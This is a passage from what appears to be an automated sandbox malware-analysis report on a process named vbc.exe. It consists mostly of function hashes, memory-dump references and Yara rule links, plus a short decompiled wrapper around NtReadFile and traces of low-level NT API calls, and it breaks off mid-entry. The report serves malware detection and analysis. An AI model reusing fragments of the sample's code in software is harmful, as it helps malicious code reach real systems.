Opcode ID: 89345bb11626058886e71abae1f5d64ca991eeed0f78604dab03a682154cbbad
Instruction ID: 9f5c648151cac16b08f521ed2d4a40a77372d7b492e1774c102258c11a720832
Opcode Fuzzy Hash: 89345bb11626058886e71abae1f5d64ca991eeed0f78604dab03a682154cbbad
Instruction Fuzzy Hash: 3E015E30A0025ADFDB20DF64E848BACB7B1FB45304F4085E5D806A7254EB7899859F49

Uniqueness

Uniqueness Score: -1.00%

Function 00428743, Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.464584322.0000000000420000.00000040.00000001.sdmp, Offset: 00420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_420000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bb4a101f29f0b49a1d14f7b2548e220f653aff4aedd0b6e19c64c44419ef6f03
Instruction ID: f8b05aaf34365c1cad558c9cc1c5ccfc0240e568173321d6c9e7d3014786fdda
Opcode Fuzzy Hash: bb4a101f29f0b49a1d14f7b2548e220f653aff4aedd0b6e19c64c44419ef6f03
Instruction Fuzzy Hash: DDF06D2088E3C49FC306CBA59C25A59BFB59F47104F5A00EBD084DB1B3C6280D48C352

Uniqueness

Uniqueness Score: -1.00%

Function 009B0240, Relevance: .0, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.465092475.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_9b0000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f677ae18ac009d005be00b4feb32fc9e12aee7e8ec94d033bc714fb0d6786e47
Instruction ID: ebecff1c259f3e6117654cdc2a8e9ce8bcab93115dee88425968e2cfb300e3ac
Opcode Fuzzy Hash: f677ae18ac009d005be00b4feb32fc9e12aee7e8ec94d033bc714fb0d6786e47
Instruction Fuzzy Hash: 75F0F930D04218AFCB44DFA9CA046AEFBF5AB88315F15C5AA986893351D7719E45DA80

Uniqueness

Uniqueness Score: -1.00%

Function 009B0230, Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.465092475.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_9b0000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b720c45a64c68c7e75c9e661646d7beb7c625caf27b11a4f1c7c616fc4ccfb89
Instruction ID: ad566a22623803b9c9b6ec4e53dc8079f631426268e9800c3a92870cf20df3e1
Opcode Fuzzy Hash: b720c45a64c68c7e75c9e661646d7beb7c625caf27b11a4f1c7c616fc4ccfb89
Instruction Fuzzy Hash: 24F09630D09254AFCB41DB78C9546AEFFB0EF49310F1485EEC868D7252D3718909DB40

Uniqueness

Uniqueness Score: -1.00%

Function 0042049A, Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.464584322.0000000000420000.00000040.00000001.sdmp, Offset: 00420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_420000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f20768f8ff64251ed130dcb465fb8e37dfdcafd1e9dfb977f45ec9915808777e
Instruction ID: 74951ab55e07c366086a02d4064f57558a56670e7e4e45f1f2a7810066bec95b
Opcode Fuzzy Hash: f20768f8ff64251ed130dcb465fb8e37dfdcafd1e9dfb977f45ec9915808777e
Instruction Fuzzy Hash: DBF0ED30D0A2589FC705DBB5AC40AADBBF09F43208F1981EED408A7273E7380E04CB48

Uniqueness

Uniqueness Score: -1.00%

Function 0042B970, Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.464584322.0000000000420000.00000040.00000001.sdmp, Offset: 00420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_420000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bda6901729e2d504063d784efbea6eb8e8ef2205a5c3239436ae831f0baa3cf8
Instruction ID: ed848345cf018220a15a719f0e8099272b9efff8d99ef4bdf0b2675b043d28bf
Opcode Fuzzy Hash: bda6901729e2d504063d784efbea6eb8e8ef2205a5c3239436ae831f0baa3cf8
Instruction Fuzzy Hash: BCE0ED3098E2849FCB01DBF8989069DBFF0CB06210F2010EEC584D3652D2780A8AC792

Uniqueness

Uniqueness Score: -1.00%

Function 0042B540, Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.464584322.0000000000420000.00000040.00000001.sdmp, Offset: 00420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_420000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7c5cdf43db2615af89965d28d4082fbdb29643beacc801bf9a4270fd7c1e6162
Instruction ID: 43ff078fa37b7b16527a1ca319ca1f7469cb92558a0413311b22d2e4148e8bc2
Opcode Fuzzy Hash: 7c5cdf43db2615af89965d28d4082fbdb29643beacc801bf9a4270fd7c1e6162
Instruction Fuzzy Hash: 9CF0FE74E49244AFCB41DBA8A85469DBFF0EB06304F11819AC84993361D2780A86CF55

Uniqueness

Uniqueness Score: -1.00%

Function 004203C4, Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.464584322.0000000000420000.00000040.00000001.sdmp, Offset: 00420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_420000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b179e8ca0b92a7803f4b176b7a88a1a1c117227a4d0b731057cb5d941654b502
Instruction ID: 5912bd012a1480dec033d04276b900abef12bbd0d11bbf95b2d0be0f6cae50cd
Opcode Fuzzy Hash: b179e8ca0b92a7803f4b176b7a88a1a1c117227a4d0b731057cb5d941654b502
Instruction Fuzzy Hash: 1EE0ED30A09018EBC704EBA9D885BAEB3F4EF06304F2600B9A40863221DB344F40DB95

Uniqueness

Uniqueness Score: -1.00%

Function 0042B9B8, Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.464584322.0000000000420000.00000040.00000001.sdmp, Offset: 00420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_420000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 608a94b953fe85d2e1c544709479f97bf3dbcc4e2957b75cd885fa43f9d23f09
Instruction ID: c91f3975b8805fc448844a53fdd26636b84862691bbbfedae2d168279f97903e
Opcode Fuzzy Hash: 608a94b953fe85d2e1c544709479f97bf3dbcc4e2957b75cd885fa43f9d23f09
Instruction Fuzzy Hash: 15F0A0309592849FCB01CBB8DC8569CBFF0EF0A210F2500EBC909C7762E2394A85CB82

Uniqueness

Uniqueness Score: -1.00%

Function 00420448, Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.464584322.0000000000420000.00000040.00000001.sdmp, Offset: 00420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_420000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d44b909ebacde5b57ffdf8e17787b778e915f625220808440e0ab6ce41bd9b66
Instruction ID: 1971acd06f18e875ca73a1a1bbabf1347bb5bf8df14de05a01d81e8e8ede7fa2
Opcode Fuzzy Hash: d44b909ebacde5b57ffdf8e17787b778e915f625220808440e0ab6ce41bd9b66
Instruction Fuzzy Hash: 80E0DF30A45108ABCB54FFF0D412BAEB3A4DF02208F11187D9109A3262DF398E00D7D9

Uniqueness

Uniqueness Score: -1.00%

Function 00420088, Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.464584322.0000000000420000.00000040.00000001.sdmp, Offset: 00420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_420000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d39a4c78810b6c899538a9ac649dcc96f338963f231d23ea38d82144a7105335
Instruction ID: 97541f4523558699264bb9e9417d7032f1699bb15fe7c040d14d39c9f998d3a2
Opcode Fuzzy Hash: d39a4c78810b6c899538a9ac649dcc96f338963f231d23ea38d82144a7105335
Instruction Fuzzy Hash: C0E0D830A04118DBC704EBA9E881B6EB3F4DF46304F5190A9A10473221DB344E00DB98

Uniqueness

Uniqueness Score: -1.00%

Function 004203D4, Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.464584322.0000000000420000.00000040.00000001.sdmp, Offset: 00420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_420000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ce9fa1c0682e09d3d27314720edaced3e8f865c00017a8bd62f5b0cb38ea19cb
Instruction ID: 1c6c37c95ca18641173473e120414e091da84b8a594bb580e8dabb59a9e39bb1
Opcode Fuzzy Hash: ce9fa1c0682e09d3d27314720edaced3e8f865c00017a8bd62f5b0cb38ea19cb
Instruction Fuzzy Hash: FFE0DF30A08028EBC704EFA9E942A6EB3B9DF49304F6310BEA40873620CB345E40D688

Uniqueness

Uniqueness Score: -1.00%

Function 004203E4, Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.464584322.0000000000420000.00000040.00000001.sdmp, Offset: 00420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_420000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1b4f76688da9a1f75a5620bb7ba7653c8c44bd05d47dd2d466ab30b09d22886b
Instruction ID: aa7acd127d6a08389fc085983c88ee39d7f07e8fb23c33af3578b83eb7dacedd
Opcode Fuzzy Hash: 1b4f76688da9a1f75a5620bb7ba7653c8c44bd05d47dd2d466ab30b09d22886b
Instruction Fuzzy Hash: 3CE0D830A05018EBC304EBA5D945B6EB3B5DF85304FA110BEA00873220DF345E40D789

Uniqueness

Uniqueness Score: -1.00%

Function 00425608, Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.464584322.0000000000420000.00000040.00000001.sdmp, Offset: 00420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_420000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 52f2ba72fbcc2c8c2d30e08aea24127523774532a62f81c54bb6e9266db13bf0
Instruction ID: 2254c3d711cdefc8bffa2320317cad4ca3c14cde2566ab0c36e2bcdbc732f7bb
Opcode Fuzzy Hash: 52f2ba72fbcc2c8c2d30e08aea24127523774532a62f81c54bb6e9266db13bf0
Instruction Fuzzy Hash: 83E0D830A05018EBC304EBA5D441A6EB3B5DF45304F9144B9A00873220CB345E00D798

Uniqueness

Uniqueness Score: -1.00%

Function 0042AF78, Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.464584322.0000000000420000.00000040.00000001.sdmp, Offset: 00420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_420000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 41e717f6ade693140a31464201d90d033232b916220a5d56356991fece6172a8
Instruction ID: daf7893ffb9f2c75a15a9de4b9da477d512f8ae20cb952b7ba48741b5c102ee2
Opcode Fuzzy Hash: 41e717f6ade693140a31464201d90d033232b916220a5d56356991fece6172a8
Instruction Fuzzy Hash: 35E09B70A19255DFC745DFB895542DC7FB09B06201F3141DEC944D3752D2380A81CB52

Uniqueness

Uniqueness Score: -1.00%

Function 009B02A0, Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.465092475.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_9b0000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 63a562edc3475f8606acd14a70ae9ce176bec77388ee9287897cf6a187abc187
Instruction ID: 1463bdcf631def355f858e619753c7df0290d2de87e975e04ac4df618e391ac7
Opcode Fuzzy Hash: 63a562edc3475f8606acd14a70ae9ce176bec77388ee9287897cf6a187abc187
Instruction Fuzzy Hash: 20E0263004F258AFC321DBB4EC506EA3BB49F03210F1211CAC05497562C3300C8EC711

Uniqueness

Uniqueness Score: -1.00%

Function 0042ADD7, Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.464584322.0000000000420000.00000040.00000001.sdmp, Offset: 00420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_420000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9b53a807ab7ae1d0e6e4f8c684c3c6a4505cd9be4bb3df3467f601abeb532553
Instruction ID: 2d00687596720c01d95094a31c1cedd898205bb07c5a65749db03274728e5af3
Opcode Fuzzy Hash: 9b53a807ab7ae1d0e6e4f8c684c3c6a4505cd9be4bb3df3467f601abeb532553
Instruction Fuzzy Hash: 58E01A30E19208EFCB04DFB8E4446AEBFB1EB49301F2082AAD809E3760D2740A91CF41

Uniqueness

Uniqueness Score: -1.00%

Function 0042B427, Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.464584322.0000000000420000.00000040.00000001.sdmp, Offset: 00420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_420000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1dbf98cc4a2e2b9bd2b967276c29c73d7b5991fffb08999ea1c635884b5d36c6
Instruction ID: a5b6c51bf074e0269f202762771cee5199151264d1cc60790b0306bc2ae23b86
Opcode Fuzzy Hash: 1dbf98cc4a2e2b9bd2b967276c29c73d7b5991fffb08999ea1c635884b5d36c6
Instruction Fuzzy Hash: 41E0E630D55158AECB44EBB8948569DBFB0DB05315F6401AEC50993751D7344A94CB92

Uniqueness

Uniqueness Score: -1.00%

Function 0042A747, Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.464584322.0000000000420000.00000040.00000001.sdmp, Offset: 00420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_420000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cd4bf0f0938f4088bb91aa7ed52097ee6a42829b8910cb4847169f9a87c4919c
Instruction ID: 778517e014d699b6e68659c5114ad8bdabb2a5acdff04fd2577ddf3b2684b6b0
Opcode Fuzzy Hash: cd4bf0f0938f4088bb91aa7ed52097ee6a42829b8910cb4847169f9a87c4919c
Instruction Fuzzy Hash: 94E08630D09108EFCB14DFA4E9447ADBF70EB46301F20415DDD0523710C3300A95DB99

Uniqueness

Uniqueness Score: -1.00%

Function 0042AA5A, Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.464584322.0000000000420000.00000040.00000001.sdmp, Offset: 00420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_420000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e6763af87b629978e5f77a86ca8790972bdbf6cf25d09172552cde1a272af7fc
Instruction ID: ae7b741bb8b265dced9b209043c99dbff4d50a0ac3941797f929968a82348f6c
Opcode Fuzzy Hash: e6763af87b629978e5f77a86ca8790972bdbf6cf25d09172552cde1a272af7fc
Instruction Fuzzy Hash: 18D0A73068E019AFC304DBA8A9506BF77588B02315F5001EE990953BA1C6350D92C366

Uniqueness

Uniqueness Score: -1.00%

Function 009B02B0, Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.465092475.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_9b0000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c4c4202d1d2a030f942914e929912ad0af617aaf2ad5f3968d0844ab5818ed82
Instruction ID: 641978045498c4e2b3e5a9c810adb32cbede434a96474b8751b514346b867cf9
Opcode Fuzzy Hash: c4c4202d1d2a030f942914e929912ad0af617aaf2ad5f3968d0844ab5818ed82
Instruction Fuzzy Hash: 2AD0223044F20CFBC320EBA8E904BBBB36CC742224F11009CC60813220CB300E84C6E1

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0100502D, Relevance: 4.9, Strings: 1, Instructions: 3685COMMON

Download Yara Rule

Strings

Actx , xrefs: 01005EF9

Memory Dump Source

Source File: 00000004.00000002.465811746.0000000001002000.00000020.00020000.sdmp, Offset: 01000000, based on PE: true

Associated: 00000004.00000002.465805228.0000000001000000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.466298890.00000000010AA000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1000000_vbc.jbxd

Similarity

API ID:
String ID: Actx
API String ID: 0-89312691
Opcode ID: 8c6ce40efe230dc7eefba797889f6151539ed045ed1c427ffce63c13b71532bc
Instruction ID: 942ac0066d923ec2112f396691e036e3bcd5fd37c0b1984738652964d7d68667
Opcode Fuzzy Hash: 8c6ce40efe230dc7eefba797889f6151539ed045ed1c427ffce63c13b71532bc
Instruction Fuzzy Hash: 1063DD6140F7C25FDB138BB85CB5291BFB19E57214B1E49CBC4C0CF0A3E219696ADB26

Uniqueness

Uniqueness Score: -1.00%

Function 01007C03, Relevance: 3.7, Instructions: 3723COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.465811746.0000000001002000.00000020.00020000.sdmp, Offset: 01000000, based on PE: true

Associated: 00000004.00000002.465805228.0000000001000000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.466298890.00000000010AA000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1000000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4ab1b1d026c8585063947cb11f3cd00638b8becea5a481fd0a73e919d2159618
Instruction ID: 7e73688b8eb09dbad0a5613f430cbfa544490959078ef1649c04eea7d0d595f2
Opcode Fuzzy Hash: 4ab1b1d026c8585063947cb11f3cd00638b8becea5a481fd0a73e919d2159618
Instruction Fuzzy Hash: 7963DF6290E7C29FEB075B785CB12A5BFB1AE53214B1E44C7C4C0CF0E7E209596AD726

Uniqueness

Uniqueness Score: -1.00%

Function 00FA419A, Relevance: 1.4, Strings: 1, Instructions: 200COMMON

Download Yara Rule

Strings

Q*DN, xrefs: 00FA422A

Memory Dump Source

Source File: 00000004.00000002.465765043.0000000000FA0000.00000040.00000001.sdmp, Offset: 00FA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_fa0000_vbc.jbxd

Similarity

API ID:
String ID: Q*DN
API String ID: 0-1650365051
Opcode ID: f1bcffc9af46534a450ec8f8dbc788334104776833ee8c09b8c85a8aea1be146
Instruction ID: 4b8c79ad7afe587d1d3b5e96dbd03420a8d552456bb2ef03a61eddeb5be9aa89
Opcode Fuzzy Hash: f1bcffc9af46534a450ec8f8dbc788334104776833ee8c09b8c85a8aea1be146
Instruction Fuzzy Hash: BDA1A2B0E406299FDBA0DF69C8846CDBBF1EF89310F1585D9D188A7205EB309E95CF16

Uniqueness

Uniqueness Score: -1.00%

Function 00FA56FD, Relevance: .4, Instructions: 366COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.465765043.0000000000FA0000.00000040.00000001.sdmp, Offset: 00FA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_fa0000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 75fea585143595e952ac16bdcfa959545a5fbc43af811933d8ba1622fe4d173a
Instruction ID: cfedce3b5598f2915c865deb4f4377796b0c7bde46f3dffecf395a4d372a10e3
Opcode Fuzzy Hash: 75fea585143595e952ac16bdcfa959545a5fbc43af811933d8ba1622fe4d173a
Instruction Fuzzy Hash: F7B176A1A8E3C16FE70386345CFA189BFA29D4312435FCADFC4C64B893D558494BEB52

Uniqueness

Uniqueness Score: -1.00%

Function 0042D9B9, Relevance: .2, Instructions: 153COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.464584322.0000000000420000.00000040.00000001.sdmp, Offset: 00420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_420000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e0c97c754a83da518a0c62b999a41e8f7bc36b36a44f0aa653594a554db84692
Instruction ID: 605a1db0ad0384155603c3f4f757c7f51ca71c4d168e777eb65488a701f1802c
Opcode Fuzzy Hash: e0c97c754a83da518a0c62b999a41e8f7bc36b36a44f0aa653594a554db84692
Instruction Fuzzy Hash: 41514D30A102498FDB44EFB9D844B9E7BF2AFC5344F04C939D504EB368EBB599068B81

Uniqueness

Uniqueness Score: -1.00%

Function 0042D9C8, Relevance: .2, Instructions: 152COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.464584322.0000000000420000.00000040.00000001.sdmp, Offset: 00420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_420000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bab32f9c195b7b89f1f61db2acf1a00d5bfddd1d8ea911d3ac2acae67a1248a5
Instruction ID: 10674c8f16945aa933034ca6f20151b5426aa2ed66d29b671a4df039621cf6ac
Opcode Fuzzy Hash: bab32f9c195b7b89f1f61db2acf1a00d5bfddd1d8ea911d3ac2acae67a1248a5
Instruction Fuzzy Hash: CA514C30A102498FDB44EFBAD844B9EBBF2AFC5344F04C939D504AB369EB7599058B81

Uniqueness

Uniqueness Score: -1.00%

Function 00FA0048, Relevance: .1, Instructions: 111COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.465765043.0000000000FA0000.00000040.00000001.sdmp, Offset: 00FA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_fa0000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f01411f1bd6d159c9fef41931616440808fd5a12937dadd34360491e4a519eb3
Instruction ID: 1f77347193ea777eb15e5b007bb5ff4dd90cdd75d2666427b24b2d650ac3bc11
Opcode Fuzzy Hash: f01411f1bd6d159c9fef41931616440808fd5a12937dadd34360491e4a519eb3
Instruction Fuzzy Hash: AA4120B1E016588BEB2CCF6B9D4078AFAF7AFC9300F14C1BA850CA6215EB7059859F55

Uniqueness

Uniqueness Score: -1.00%

Function 00FA0047, Relevance: .1, Instructions: 101COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.465765043.0000000000FA0000.00000040.00000001.sdmp, Offset: 00FA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_fa0000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4486c89b858c653fba0bdfa3ee002100c1486a3a3acb6a91f05baf188f2f818d
Instruction ID: 725d81ff829c321c21298e71ec719617b5ad77c1698839a07c14bc56c1d78cad
Opcode Fuzzy Hash: 4486c89b858c653fba0bdfa3ee002100c1486a3a3acb6a91f05baf188f2f818d
Instruction Fuzzy Hash: B94111B1E016588BEB6CCF6B9D4079EFAF3AFC5300F14C1BA890DAA215EB7005859F15

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: vbc.exe PID: 2024 Parent PID: 2796 vbc.exeCOMMON

Execution Graph

Execution Coverage:	2.9%
Dynamic/Decrypted Code Coverage:	3.8%
Signature Coverage:	6.1%
Total number of Nodes:	553
Total number of Limit Nodes:	72

Executed Functions

Function 00419E00, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36
filenativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 37%

			E00419E00(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, intOrPtr _a40) {
				void* _t18;
				void* _t27;
				intOrPtr* _t28;

				_t13 = _a4;
				_t28 = _a4 + 0xc48;
				E0041A950(_t27, _t13, _t28,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
				_t6 =  &_a32; // 0x414d32
				_t12 =  &_a8; // 0x414d32
				_t18 =  *((intOrPtr*)( *_t28))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36, _a40); // executed
				return _t18;
			}

0x00419e03
0x00419e0f
0x00419e17
0x00419e22
0x00419e3d
0x00419e45
0x00419e49

APIs

NtReadFile.NTDLL(2MA,5EB6522D,FFFFFFFF,004149F1,?,?,2MA,?,004149F1,FFFFFFFF,5EB6522D,00414D32,?,00000000), ref: 00419E45

Strings

2MA, xrefs: 00419E22, 00419E30
2MA, xrefs: 00419E3D, 00419E44

Memory Dump Source

Source File: 00000005.00000002.507081132.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_vbc.jbxd

Yara matches

Similarity

API ID: FileRead
String ID: 2MA$2MA
API String ID: 2738559852-947276439
Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
Instruction ID: e2eeafcdabc96c90d19f56ab9cfe9238ee24689222a5818d11d4b5cf4f7c0d6d
Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
Instruction Fuzzy Hash: 90F0B7B2210208AFCB14DF89DC91EEB77ADEF8C754F158649BE1D97241D630E851CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00419D4A, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 42
filenativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtCreateFile.NTDLL(00000060,00409CC3,?,wKA,00409CC3,FFFFFFFF,?,?,FFFFFFFF,00409CC3,00414B77,?,00409CC3,00000060,00000000,00000000), ref: 00419D9D

Strings

wKA, xrefs: 00419D89, 00419D94

Memory Dump Source

Source File: 00000005.00000002.507081132.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_vbc.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID: wKA
API String ID: 823142352-3165208591
Opcode ID: 7ab8469d83ad9bd10d0e6db8322583e6e74e3138565224800667b1ee1b7d3bde
Instruction ID: 9ed6e26d88a505840e18b06861ebfba83fffb53acf388e89c63ac865cd2a6e33
Opcode Fuzzy Hash: 7ab8469d83ad9bd10d0e6db8322583e6e74e3138565224800667b1ee1b7d3bde
Instruction Fuzzy Hash: 7501F2B2201108AFCB08CF89CC91EEB37A9BF8C354F118248FA1C97241C630E851CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00419D50, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40
filenativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtCreateFile.NTDLL(00000060,00409CC3,?,wKA,00409CC3,FFFFFFFF,?,?,FFFFFFFF,00409CC3,00414B77,?,00409CC3,00000060,00000000,00000000), ref: 00419D9D

Strings

wKA, xrefs: 00419D89, 00419D94

Memory Dump Source

Source File: 00000005.00000002.507081132.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_vbc.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID: wKA
API String ID: 823142352-3165208591
Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
Instruction ID: 0d977cd1f4fbd36c9bd444ef8f6a04c43f7f15de33bda2cf86b45a3658e1eede
Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
Instruction Fuzzy Hash: BFF0BDB2211208AFCB08CF89DC95EEB77ADAF8C754F158248BA1D97241C630E8518BA4

Uniqueness

Uniqueness Score: -1.00%

Function 0040ACC0, Relevance: 1.5, APIs: 1, Instructions: 48
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040AD32

Memory Dump Source

Source File: 00000005.00000002.507081132.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_vbc.jbxd

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 8dd989eea79af60a2177110ff857ca10202f9c8b5bfc158903865a0a4b584fe4
Instruction ID: 8d9c8c5cc187846e167d7fc499b748faaade23025a89af1130ee390205ce80a6
Opcode Fuzzy Hash: 8dd989eea79af60a2177110ff857ca10202f9c8b5bfc158903865a0a4b584fe4
Instruction Fuzzy Hash: C40152B5D4020DA7DB10DBE5DC42FDEB7789F14308F0041AAE908A7281F634EB54C795

Uniqueness

Uniqueness Score: -1.00%

Function 00419F2A, Relevance: 1.5, APIs: 1, Instructions: 33
memorynativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041AB24,?,00000000,?,00003000,00000040,00000000,00000000,00409CC3), ref: 00419F69

Memory Dump Source

